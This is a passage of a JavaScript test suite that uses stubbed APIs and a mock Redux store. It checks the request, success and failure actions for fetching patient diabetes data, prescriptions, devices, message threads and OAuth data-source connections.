      let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_DATA_CLINICIAN_UNAUTHORIZED);
      err.status = 403;
      let expectedActions = [
        { type: 'FETCH_SERVER_TIME_REQUEST' },
        { type: 'FETCH_SERVER_TIME_SUCCESS', payload: { serverTime } },
        {
          type: 'FETCH_PATIENT_DATA_FAILURE',
          error: err,
          meta: { apiError: { status: 403, body:
            'Error!' } }, }, ];
      _.each(expectedActions, (action) => {
        expect(isTSA(action)).to.be.true;
      });
      let store = mockStore({
        blip: {
          ...initialState,
          ...{ loggedInUserId: 'clinicianuser123' },
        },
      });
      store.dispatch(async.fetchPatientData(api, options, patientId));
      const actions = store.getActions();
      expect(actions[2].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_DATA_CLINICIAN_UNAUTHORIZED });
      expectedActions[2].error = actions[2].error;
      expect(actions).to.eql(expectedActions);
    });

    it('should use server time (plus 1 day, minus 30) for date range of data fetching if all latest diabetes datums returns empty results', () => {
      let store = mockStore({ blip: {
        ...initialState,
      }, router: { location: { pathname: `data/${patientId}` } } });
      // Set all times in response to 1 year past server time
      api.patientData.get = sinon.stub().callsArgWith(2, null, []);
      store.dispatch(async.fetchPatientData(api, options, patientId));
      expect(api.server.getTime.callCount).to.equal(1);
      expect(api.patientData.get.withArgs(patientId, {
        ...options,
        startDate: '2018-01-02T00:00:00.000Z', // 30 days before serverTime
        endDate: '2018-02-02T00:00:00.000Z', // 1 day beyond serverTime
      }).callCount).to.equal(1);
    });

    it('should fetch the latest data for all diabetes types and pumpSettings', () => {
      let store = mockStore({ blip: {
        ...initialState,
      }, router: { location: { pathname: `data/${patientId}` } } });
      store.dispatch(async.fetchPatientData(api, options, patientId));
      // The "latest datum" probe requests one most-recent record per type.
      expect(api.patientData.get.withArgs(patientId, {
        type: [
          'cbg',
          'smbg',
          'basal',
          'bolus',
          'wizard',
          'food',
          'pumpSettings',
          'upload',
        ].join(','),
        latest: 1,
        endDate: '2018-02-02T00:00:00.000Z', // 1 day beyond serverTime
      }).callCount).to.equal(1);
    });

    it('should fetch the patient data 30 days prior to the latest diabetes datum time returned', () => {
      let store = mockStore({ blip: {
        ...initialState,
      }, router: { location: { pathname: `data/${patientId}` } } });
      api.patientData.get = sinon.stub().callsArgWith(2,
        null, patientData);
      store.dispatch(async.fetchPatientData(api, options, patientId));
      expect(api.patientData.get.callCount).to.equal(3);
      // Should set the start date based on the latest smbg, even though the pump settings and upload are more recent
      expect(api.patientData.get.withArgs(patientId, {
        ...options,
        startDate: '2017-12-31T00:00:00.000Z',
        endDate: '2018-01-31T00:00:00.000Z',
      }).callCount).to.equal(1);
    });
  });

  // Post-fetch handling: the add-data request is only forwarded to the data worker
  // when the router's current pathname still matches the fetched patient.
  context('handleFetchSuccess', () => {
    beforeEach(() => {
      options.initial = false;
    });

    context('fetching data for current patient in view', () => {
      it('should trigger FETCH_PATIENT_DATA_SUCCESS and DATA_WORKER_ADD_DATA_REQUEST', () => {
        options.getPumpSettingsUploadRecordById = 'upload123';
        api.patientData = {
          get: sinon.stub()
            .onFirstCall().callsArgWith(2, null, patientData)
            .onSecondCall().callsArgWith(2, null, [ uploadRecord ]),
        };
        let expectedActions = [
          { type: 'FETCH_PATIENT_DATA_REQUEST', payload: { patientId } },
          { type: 'FETCH_PATIENT_DATA_SUCCESS', payload: { patientId } },
          {
            type: 'DATA_WORKER_ADD_DATA_REQUEST',
            meta: { WebWorker: true, worker: 'data', origin: 'http://originStub', patientId },
            payload: {
              data: JSON.stringify([...patientData, uploadRecord, ...teamNotes]),
              fetchedCount: 6,
              patientId: patientId,
              fetchedUntil: '2018-01-01T00:00:00.000Z',
              returnData: false,
            },
          },
        ];
        _.each(expectedActions, (action) => {
          expect(isTSA(action)).to.be.true;
        });
        let store = mockStore({ blip: {
          ...initialState,
        }, router: { location: { pathname: `data/${patientId}` } } });
        store.dispatch(async.fetchPatientData(api, options, patientId));
        const actions = store.getActions();
        // The worker meta origin is environment-dependent; normalize before eql.
        actions[2].meta.origin = 'http://originStub';
        expect(actions).to.eql(expectedActions);
        expect(api.patientData.get.withArgs(patientId, options).callCount).to.equal(1);
        expect(api.team.getNotes.withArgs(patientId).callCount).to.equal(1);
      });
    });

    context('not fetching data for current patient in view (i.e. stale request)', () => {
      it('should only trigger FETCH_PATIENT_DATA_SUCCESS and not DATA_WORKER_ADD_DATA_REQUEST', () => {
        // NOTE(review): 'xyz<PASSWORD>' looks like a redacted placeholder id — confirm
        // the intended literal; any id different from patientId exercises this path.
        const otherPatientId = 'xyz<PASSWORD>';
        let expectedActions = [
          { type: 'FETCH_PATIENT_DATA_REQUEST', payload: { patientId } },
          { type: 'FETCH_PATIENT_DATA_SUCCESS', payload: { patientId } },
        ];
        _.each(expectedActions, (action) => {
          expect(isTSA(action)).to.be.true;
        });
        let store = mockStore({ blip: {
          ...initialState,
        }, router: { location: { pathname: `data/${otherPatientId}` } } });
        store.dispatch(async.fetchPatientData(api, options, patientId));
        const actions = store.getActions();
        expect(actions).to.eql(expectedActions);
        expect(api.patientData.get.withArgs(patientId, options).callCount).to.equal(1);
        expect(api.team.getNotes.withArgs(patientId).callCount).to.equal(1);
      });
    });
  });

  // Error paths for the non-initial fetch and the pump-settings-upload follow-up fetch.
  context('handleFetchErrors', () => {
    it('should trigger FETCH_PATIENT_DATA_FAILURE and it should call error once for a failed request due to patient data call returning error', () => {
      options.initial = false;
      api.patientData = {
        get: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null),
      };
      let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_DATA);
      err.status = 500;
      let expectedActions = [
        { type: 'FETCH_PATIENT_DATA_REQUEST', payload: { patientId } },
        { type: 'FETCH_PATIENT_DATA_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }
      ];
      _.each(expectedActions, (action) => {
        expect(isTSA(action)).to.be.true;
      });
      let store = mockStore({ blip: initialState, router: { location: { pathname: `data/${patientId}` } } });
      store.dispatch(async.fetchPatientData(api, options, patientId));
      const actions = store.getActions();
      expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_DATA });
      expectedActions[1].error = actions[1].error;
      expect(actions).to.eql(expectedActions);
      expect(api.patientData.get.withArgs(patientId, options).callCount).to.equal(1);
      expect(api.team.getNotes.withArgs(patientId).callCount).to.equal(1);
    });

    it('should trigger FETCH_PATIENT_DATA_FAILURE and it should call error once for a failed request due to latest pump settings upload call returning error', () => {
      options.initial = true;
      // Three sequential patientData.get calls: latest-datums probe succeeds, the
      // range fetch succeeds (pumpSettings stripped), then the follow-up fetch of the
      // pump settings upload record fails with a 500.
      api.patientData = {
        get: sinon.stub()
          .onFirstCall().callsArgWith(2, null, patientData)
          .onSecondCall().callsArgWith(2, null, _.reject(patientData, { type: 'pumpSettings' }))
          .onThirdCall().callsArgWith(2, {status: 500, body: 'Error!'}, null),
      };
      let err = new Error(ErrorMessages.ERR_FETCHING_LATEST_PUMP_SETTINGS_UPLOAD);
      err.status = 500;
      let expectedActions = [
        { type: 'FETCH_SERVER_TIME_REQUEST'},
        { type: 'FETCH_SERVER_TIME_SUCCESS', payload: { serverTime } },
        { type: 'FETCH_PATIENT_DATA_REQUEST', payload: { patientId } },
        { type: 'FETCH_PATIENT_DATA_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }
      ];
      _.each(expectedActions, (action) => {
        expect(isTSA(action)).to.be.true;
      });
      let store = mockStore({ blip: initialState, router: { location: { pathname: `data/${patientId}` } } });
      store.dispatch(async.fetchPatientData(api, options, patientId));
      const actions = store.getActions();
      expect(actions[3].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_LATEST_PUMP_SETTINGS_UPLOAD });
      expectedActions[3].error = actions[3].error;
      expect(actions).to.eql(expectedActions);
      expect(api.patientData.get.withArgs(patientId, options).callCount).to.equal(1);
      expect(api.team.getNotes.withArgs(patientId).callCount).to.equal(1);
    });

    it('should trigger FETCH_MESSAGE_THREAD_FAILURE and it should call error once for a failed request due to team notes call returning error', () => {
      options.initial = false;
      api.team = {
        getNotes: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null)
      };
      let err = new Error(ErrorMessages.ERR_FETCHING_MESSAGE_THREAD);
      err.status = 500;
      let expectedActions = [
        { type: 'FETCH_PATIENT_DATA_REQUEST', payload: { patientId } },
        { type:
          'FETCH_MESSAGE_THREAD_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }
      ];
      _.each(expectedActions, (action) => {
        expect(isTSA(action)).to.be.true;
      });
      let store = mockStore({ blip: initialState });
      store.dispatch(async.fetchPatientData(api, options, patientId));
      const actions = store.getActions();
      expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_MESSAGE_THREAD });
      expectedActions[1].error = actions[1].error;
      expect(actions).to.eql(expectedActions);
      expect(api.patientData.get.withArgs(patientId, options).callCount).to.equal(1);
      expect(api.team.getNotes.withArgs(patientId).callCount).to.equal(1);
    });
  });
});

// fetchSettings thunk: api.metadata.settings.get stubbed with callback at arg index 1.
describe('fetchSettings', () => {
  it('should trigger FETCH_SETTINGS_SUCCESS and it should call fetchSettings once for a successful request', () => {
    let patientId = 1234;
    let settings = { siteChangeSource: 'cannulaPrime' };
    let api = {
      metadata: {
        settings: {
          get: sinon.stub().callsArgWith(1, null, settings)
        }
      }
    };
    let expectedActions = [
      { type: 'FETCH_SETTINGS_REQUEST' },
      { type: 'FETCH_SETTINGS_SUCCESS', payload: { settings: settings } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.fetchSettings(api, patientId));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.metadata.settings.get.calledWith(patientId)).to.be.true;
  });

  it('should trigger FETCH_SETTINGS_FAILURE and it should call fetchSettings once for a failed request', () => {
    let patientId = 1234;
    let api = {
      metadata: {
        settings: {
          get: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'})
        }
      }
    };
    let err = new Error(ErrorMessages.ERR_FETCHING_SETTINGS);
    err.status = 500;
    let expectedActions = [
      { type: 'FETCH_SETTINGS_REQUEST' },
      { type: 'FETCH_SETTINGS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let
store = mockStore({ blip: initialState }); store.dispatch(async.fetchSettings(api, patientId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_SETTINGS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.metadata.settings.get.calledWith(patientId)).to.be.true; }); }); describe('fetchClinicPrescriptions', () => { it('should trigger FETCH_CLINIC_PRESCRIPTIONS_SUCCESS and it should call prescription.getAllForClinic once for a successful request', () => { const clinicId = 'clinic123'; let prescriptions = [ { id: 'one' } ]; let api = { prescription: { getAllForClinic: sinon.stub().callsArgWith(1, null, prescriptions), }, }; let expectedActions = [ { type: 'FETCH_CLINIC_PRESCRIPTIONS_REQUEST' }, { type: 'FETCH_CLINIC_PRESCRIPTIONS_SUCCESS', payload: { prescriptions : prescriptions } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicPrescriptions(api, clinicId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.prescription.getAllForClinic.callCount).to.equal(1); }); it('should trigger FETCH_CLINIC_PRESCRIPTIONS_FAILURE and it should call error once for a failed request', () => { const clinicId = 'clinic123'; let api = { prescription: { getAllForClinic: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINIC_PRESCRIPTIONS); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINIC_PRESCRIPTIONS_REQUEST' }, { type: 'FETCH_CLINIC_PRESCRIPTIONS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicPrescriptions(api, clinicId)); const actions = store.getActions(); 
// Tail of the fetchClinicPrescriptions failure spec: verify the error message,
// copy the Error instance into the expectation (identity can't be deep-compared),
// then compare the full action list and stub call count.
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINIC_PRESCRIPTIONS });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.prescription.getAllForClinic.callCount).to.equal(1);
}); });

// Specs for createPrescription (new prescription in a clinic).
describe('createPrescription', () => {
it('should trigger CREATE_PRESCRIPTION_SUCCESS and it should call prescription.create once for a successful request', () => {
let prescription = { id: 'one' };
const clinicId = 'clinic123';
// Callback is the third argument (index 2): create(clinicId, prescription, cb).
let api = { prescription: { create: sinon.stub().callsArgWith(2, null, prescription), }, };
let expectedActions = [ { type: 'CREATE_PRESCRIPTION_REQUEST' }, { type: 'CREATE_PRESCRIPTION_SUCCESS', payload: { prescription : prescription } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.createPrescription(api, clinicId, prescription));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.prescription.create.withArgs(clinicId, prescription).callCount).to.equal(1);
});
it('should trigger CREATE_PRESCRIPTION_FAILURE and it should call error once for a failed request', () => {
let prescription = { id: 'one' };
const clinicId = 'clinic123';
let api = { prescription: { create: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, };
let err = new Error(ErrorMessages.ERR_CREATING_PRESCRIPTION);
err.status = 500;
let expectedActions = [ { type: 'CREATE_PRESCRIPTION_REQUEST' }, { type: 'CREATE_PRESCRIPTION_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.createPrescription(api, clinicId, prescription));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CREATING_PRESCRIPTION });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.prescription.create.withArgs(clinicId, prescription).callCount).to.equal(1);
}); });

// Specs for createPrescriptionRevision (new revision of an existing prescription).
describe('createPrescriptionRevision', () => {
it('should trigger CREATE_PRESCRIPTION_REVISION_SUCCESS and it should call prescription.createRevision once for a successful request', () => {
let prescription = { id: 'one' };
const clinicId = 'clinic123';
// Callback is the fourth argument (index 3): createRevision(clinicId, rx, rxId, cb).
let api = { prescription: { createRevision: sinon.stub().callsArgWith(3, null, prescription), }, };
let expectedActions = [ { type: 'CREATE_PRESCRIPTION_REVISION_REQUEST' }, { type: 'CREATE_PRESCRIPTION_REVISION_SUCCESS', payload: { prescription : prescription } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.createPrescriptionRevision(api, clinicId, prescription, prescription.id));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.prescription.createRevision.withArgs(clinicId, prescription, prescription.id).callCount).to.equal(1);
});
it('should trigger CREATE_PRESCRIPTION_REVISION_FAILURE and it should call error once for a failed request', () => {
let prescription = { id: 'one' };
const clinicId = 'clinic123';
let api = { prescription: { createRevision: sinon.stub().callsArgWith(3, {status: 500, body: 'Error!'}, null), }, };
let err = new Error(ErrorMessages.ERR_CREATING_PRESCRIPTION_REVISION);
err.status = 500;
let expectedActions = [ { type: 'CREATE_PRESCRIPTION_REVISION_REQUEST' }, { type: 'CREATE_PRESCRIPTION_REVISION_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.createPrescriptionRevision(api, clinicId, prescription, prescription.id));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message:
// Tail of the createPrescriptionRevision failure spec (continues the
// deep.include assertion started on the previous line).
ErrorMessages.ERR_CREATING_PRESCRIPTION_REVISION });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.prescription.createRevision.withArgs(clinicId, prescription, prescription.id).callCount).to.equal(1);
}); });

// Specs for deletePrescription; note the REQUEST action also carries the
// prescriptionId payload (used for optimistic UI state), unlike other specs.
describe('deletePrescription', () => {
it('should trigger DELETE_PRESCRIPTION_SUCCESS and it should call prescription.delete once for a successful request', () => {
let prescriptionId = 'one';
const clinicId = 'clinic123';
let api = { prescription: { delete: sinon.stub().callsArgWith(2, null), }, };
let expectedActions = [ { type: 'DELETE_PRESCRIPTION_REQUEST', payload: { prescriptionId : prescriptionId } }, { type: 'DELETE_PRESCRIPTION_SUCCESS', payload: { prescriptionId : prescriptionId } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.deletePrescription(api, clinicId, prescriptionId));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.prescription.delete.withArgs(clinicId, prescriptionId).callCount).to.equal(1);
});
it('should trigger DELETE_PRESCRIPTION_FAILURE and it should call error once for a failed request', () => {
let prescriptionId = 'one';
const clinicId = 'clinic123';
let api = { prescription: { delete: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, };
let err = new Error(ErrorMessages.ERR_DELETING_PRESCRIPTION);
err.status = 500;
let expectedActions = [ { type: 'DELETE_PRESCRIPTION_REQUEST', payload: { prescriptionId : prescriptionId } }, { type: 'DELETE_PRESCRIPTION_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.deletePrescription(api, clinicId, prescriptionId));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message:
ErrorMessages.ERR_DELETING_PRESCRIPTION });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.prescription.delete.withArgs(clinicId, prescriptionId).callCount).to.equal(1);
}); });

// Specs for fetchDevices (device metadata list; API takes only a callback).
describe('fetchDevices', () => {
it('should trigger FETCH_DEVICES_SUCCESS and it should call devices.getAll once for a successful request', () => {
let devices = [ { id: 'one' } ];
// Callback is the first argument (index 0): getAll(cb).
let api = { devices: { getAll: sinon.stub().callsArgWith(0, null, devices), }, };
let expectedActions = [ { type: 'FETCH_DEVICES_REQUEST' }, { type: 'FETCH_DEVICES_SUCCESS', payload: { devices : devices } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchDevices(api));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.devices.getAll.callCount).to.equal(1);
});
it('should trigger FETCH_DEVICES_FAILURE and it should call error once for a failed request', () => {
let api = { devices: { getAll: sinon.stub().callsArgWith(0, {status: 500, body: 'Error!'}, null), }, };
let err = new Error(ErrorMessages.ERR_FETCHING_DEVICES);
err.status = 500;
let expectedActions = [ { type: 'FETCH_DEVICES_REQUEST' }, { type: 'FETCH_DEVICES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchDevices(api));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_DEVICES });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.devices.getAll.callCount).to.equal(1);
}); });

// Specs for fetchMessageThread (messages for a given thread id).
describe('fetchMessageThread', () => {
it('should trigger FETCH_MESSAGE_THREAD_SUCCESS and it should call error once for a successful request', () => {
// NOTE(review): no trailing semicolon here in the original — the line break
// before `let api` is load-bearing (ASI) and must be kept.
let messageThread = [ { message: 'Foobar' } ]
let api = {
// Continuation of the fetchMessageThread success spec's api stub object.
team: { getMessageThread: sinon.stub().callsArgWith(1, null, messageThread) } };
let expectedActions = [ { type: 'FETCH_MESSAGE_THREAD_REQUEST' }, { type: 'FETCH_MESSAGE_THREAD_SUCCESS', payload: { messageThread : messageThread } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
// 300 is an arbitrary thread id; verified against the stub below.
store.dispatch(async.fetchMessageThread(api, 300));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.team.getMessageThread.withArgs(300).callCount).to.equal(1);
});
it('should trigger FETCH_MESSAGE_THREAD_FAILURE and it should call error once for a failed request', () => {
// NOTE(review): no trailing semicolon — the line break before `let api`
// is load-bearing (ASI) and must be kept.
let messageThread = [ { message: 'Foobar' } ]
let api = { team: { getMessageThread: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null) } };
let err = new Error(ErrorMessages.ERR_FETCHING_MESSAGE_THREAD);
err.status = 500;
let expectedActions = [ { type: 'FETCH_MESSAGE_THREAD_REQUEST' }, { type: 'FETCH_MESSAGE_THREAD_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchMessageThread(api, 400));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_MESSAGE_THREAD });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.team.getMessageThread.withArgs(400).callCount).to.equal(1);
}); });

// Specs for fetchDataSources (connected OAuth data sources for the user).
describe('fetchDataSources', () => {
it('should trigger FETCH_DATA_SOURCES_SUCCESS and it should call error once for a successful request', () => {
let dataSources = [ { id: 'strava' }, { id: 'fitbit' }, ];
let api = { user: { getDataSources: sinon.stub().callsArgWith(0, null, dataSources) } };
let expectedActions = [ { type: 'FETCH_DATA_SOURCES_REQUEST' }, { type: 'FETCH_DATA_SOURCES_SUCCESS', payload: { dataSources : dataSources } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchDataSources(api));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.user.getDataSources.callCount).to.equal(1);
});
it('should trigger FETCH_DATA_SOURCES_FAILURE and it should call error once for a failed request', () => {
let api = { user: { getDataSources: sinon.stub().callsArgWith(0, {status: 500, body: 'Error!'}, null) } };
let err = new Error(ErrorMessages.ERR_FETCHING_DATA_SOURCES);
err.status = 500;
let expectedActions = [ { type: 'FETCH_DATA_SOURCES_REQUEST' }, { type: 'FETCH_DATA_SOURCES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchDataSources(api));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_DATA_SOURCES });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.user.getDataSources.callCount).to.equal(1);
}); });

// Specs for connectDataSource (restricted token + OAuth authorization URL flow).
describe('connectDataSource', () => {
it('should trigger CONNECT_DATA_SOURCE_SUCCESS and it should call error once for a successful request', () => {
let restrictedToken = { id: 'blah.blah.blah'};
let url = 'fitbit.url';
// Two-step flow: create a restricted token, then exchange it for a provider
// authorization URL; both are stubbed to succeed.
let api = { user: { createRestrictedToken: sinon.stub().callsArgWith(1, null, restrictedToken), createOAuthProviderAuthorization: sinon.stub().callsArgWith(2, null, url), } };
let expectedActions = [ { type: 'CONNECT_DATA_SOURCE_REQUEST' }, { type: 'CONNECT_DATA_SOURCE_SUCCESS', payload: { authorizedDataSource : { id: 'fitbit', url: url}} } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.connectDataSource(api, 'fitbit', { path: [ '/v1/oauth/fitbit' ] }, {
// Continuation of the connectDataSource success spec: the data-source info
// object ({ providerType, providerName }) completes the dispatch call.
providerType: 'oauth', providerName: 'fitbit' }));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.user.createRestrictedToken.withArgs({ path: [ '/v1/oauth/fitbit' ] }).callCount).to.equal(1);
expect(api.user.createOAuthProviderAuthorization.withArgs('fitbit', restrictedToken.id).callCount).to.equal(1);
});
it('should trigger CONNECT_DATA_SOURCE_FAILURE and it should call error once for an unexpected provider type', () => {
// Stubs are never invoked here: the action creator rejects the unknown
// providerType before any API call, so meta.apiError is a plain string.
let api = { user: { createRestrictedToken: sinon.stub(), createOAuthProviderAuthorization: sinon.stub(), } };
let err = new Error(ErrorMessages.ERR_CONNECTING_DATA_SOURCE);
let expectedActions = [ { type: 'CONNECT_DATA_SOURCE_REQUEST' }, { type: 'CONNECT_DATA_SOURCE_FAILURE', error: err, meta: { apiError: 'Unknown data source type' } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.connectDataSource(api, 'strava', { path: [ '/v1/oauth/strava' ] }, { providerType: 'unexpected', providerName: 'strava' }));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CONNECTING_DATA_SOURCE });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.user.createRestrictedToken.callCount).to.equal(0);
expect(api.user.createOAuthProviderAuthorization.callCount).to.equal(0);
});
it('should trigger CONNECT_DATA_SOURCE_FAILURE and it should call error once for a failed request', () => {
// Token creation fails, so the second step must never be reached.
let api = { user: { createRestrictedToken: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), createOAuthProviderAuthorization: sinon.stub(), } };
let err = new Error(ErrorMessages.ERR_CONNECTING_DATA_SOURCE);
err.status = 500;
let expectedActions = [ { type: 'CONNECT_DATA_SOURCE_REQUEST' }, { type: 'CONNECT_DATA_SOURCE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => {
expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.connectDataSource(api, 'strava', { path: [ '/v1/oauth/strava' ] }, { providerType: 'oauth', providerName: 'strava' }));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CONNECTING_DATA_SOURCE });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.user.createRestrictedToken.withArgs({ path: [ '/v1/oauth/strava' ] }).callCount).to.equal(1);
expect(api.user.createOAuthProviderAuthorization.callCount).to.equal(0);
}); });

// Specs for disconnectDataSource (revoke a provider's OAuth authorization).
describe('disconnectDataSource', () => {
it('should trigger DISCONNECT_DATA_SOURCE_SUCCESS and it should call error once for a successful request', () => {
let restrictedToken = { id: 'blah.blah.blah'};
let api = { user: { deleteOAuthProviderAuthorization: sinon.stub().callsArgWith(1, null, restrictedToken), } };
// SUCCESS payload is intentionally empty — nothing to store on disconnect.
let expectedActions = [ { type: 'DISCONNECT_DATA_SOURCE_REQUEST' }, { type: 'DISCONNECT_DATA_SOURCE_SUCCESS', payload: {}} ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.disconnectDataSource(api, 'fitbit', { providerType: 'oauth', providerName: 'fitbit' }));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.user.deleteOAuthProviderAuthorization.withArgs('fitbit').callCount).to.equal(1);
});
it('should trigger DISCONNECT_DATA_SOURCE_FAILURE and it should call error once for an unexpected provider type', () => {
// Unknown providerType: the stub must never be called.
let api = { user: { deleteOAuthProviderAuthorization: sinon.stub(), } };
let err = new Error(ErrorMessages.ERR_DISCONNECTING_DATA_SOURCE);
let expectedActions = [ { type: 'DISCONNECT_DATA_SOURCE_REQUEST' }, { type: 'DISCONNECT_DATA_SOURCE_FAILURE', error: err, meta: { apiError: 'Unknown data source type' } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store
// Continuation of the disconnectDataSource unexpected-provider spec
// (completes the `let store` declaration started on the previous line).
= mockStore({ blip: initialState });
store.dispatch(async.disconnectDataSource(api, 'strava', { providerType: 'unexpected', providerName: 'strava' }));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DISCONNECTING_DATA_SOURCE });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.user.deleteOAuthProviderAuthorization.callCount).to.equal(0);
});
it('should trigger DISCONNECT_DATA_SOURCE_FAILURE and it should call error once for a failed request', () => {
let api = { user: { deleteOAuthProviderAuthorization: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), } };
let err = new Error(ErrorMessages.ERR_DISCONNECTING_DATA_SOURCE);
err.status = 500;
let expectedActions = [ { type: 'DISCONNECT_DATA_SOURCE_REQUEST' }, { type: 'DISCONNECT_DATA_SOURCE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.disconnectDataSource(api, 'strava', { providerType: 'oauth', providerName: 'strava' }));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DISCONNECTING_DATA_SOURCE });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
